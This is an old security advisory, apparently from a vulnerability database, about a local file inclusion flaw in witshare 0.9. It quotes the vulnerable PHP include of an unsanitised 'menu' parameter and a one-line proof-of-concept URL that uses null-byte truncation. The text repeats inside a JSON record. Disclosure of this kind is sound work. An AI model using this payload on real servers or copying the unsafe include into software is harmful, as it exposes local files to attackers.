witshare 0.9 Local File Include Vulnerabilitiy

2007-04-11T00:00:00

Description

""""""""""""""""""""""""""""""""""""""""""""""" """ :: :: ::::: :::: """ """ :: :: :: : :: """ """ :::: :: :: ::::: ::::: :::: """ """ :: :: ::: ::: :: :: :: :: :: """ """ :: :: :: : : ::::: :: :: :::: """ """ """ """"""""""""""""""""""""""""""""""""""""""""""" Xmor$ Security Vulnerability Research TM # Tilte: witshare 0.9 Local File Include Vulnerabilitiy # Author..................: [the_Edit0r] # HomePage ...............: [Www.XmorS-sEcurity.coM] # Location ...............: [Iran] # Software ...............: [witshare] # Site Script ............: [http://sourceforge.net/projects/witshare/] # We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T ,DarkAngel ] ------------------------------------- Codes -------------------------------- <?php if (isset($_GET['menu'])) { include('pagelets/'.$_GET['menu'].'.inc');} else { include('pagelets/about.inc');} ?> ------------------------------- proof Of Concept --------------------------- www.example.com/[path]/index.php?menu=[Local Script]%00 ---------------------------------------------------------------------------- # Contact me : the_3dit0r[at]Yahoo[dot]coM # [XmorS-SEcurity.coM] # milw0rm.com [2007-04-08]

{"id": "SECURITYVULNS:DOC:16675", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "witshare 0.9 Local File Include Vulnerabilitiy", "description": """"""""""""""""""""""""""""""""""""""""""""""""\r\n""" :: :: ::::: :::: """\r\n""" :: :: :: : :: """\r\n""" :::: :: :: ::::: ::::: :::: """\r\n""" :: :: ::: ::: :: :: :: :: :: """\r\n""" :: :: :: : : ::::: :: :: :::: """\r\n""" """\r\n"""""""""""""""""""""""""""""""""""""""""""""""\r\n Xmor$ Security Vulnerability Research TM\r\n\r\n# Tilte: witshare 0.9 Local File Include Vulnerabilitiy\r\n\r\n# Author..................: [the_Edit0r]\r\n# HomePage ...............: [Www.XmorS-sEcurity.coM]\r\n# Location ...............: [Iran]\r\n# Software ...............: [witshare]\r\n# Site Script ............: [http://sourceforge.net/projects/witshare/]\r\n# We ArE .................: [ Scorpiunix,KAMY4r,Zer0.Cod3r,SilliCONIC,D3vil_B0y_ir,S.W.A.T ,DarkAngel ]\r\n \r\n\r\n------------------------------------- Codes --------------------------------\r\n\r\n<?php\r\n if (isset($_GET['menu'])) {\r\n include('pagelets/'.$_GET['menu'].'.inc');}\r\n else {\r\n include('pagelets/about.inc');}\r\n ?>\r\n------------------------------- proof Of Concept ---------------------------\r\n \r\n www.example.com/[path]/index.php?menu=[Local Script]%00\r\n \r\n\r\n----------------------------------------------------------------------------\r\n \r\n \r\n# Contact me : the_3dit0r[at]Yahoo[dot]coM\r\n# [XmorS-SEcurity.coM]\r\n\r\n# milw0rm.com [2007-04-08]", "published": "2007-04-11T00:00:00", "modified": "2007-04-11T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16675", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:21", "viewCount": 56, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 0.2}, "_state": {"dependencies": 1678962117, "score": 1684015796, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "0f57aab4077da6b563dda614dd687e3b"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}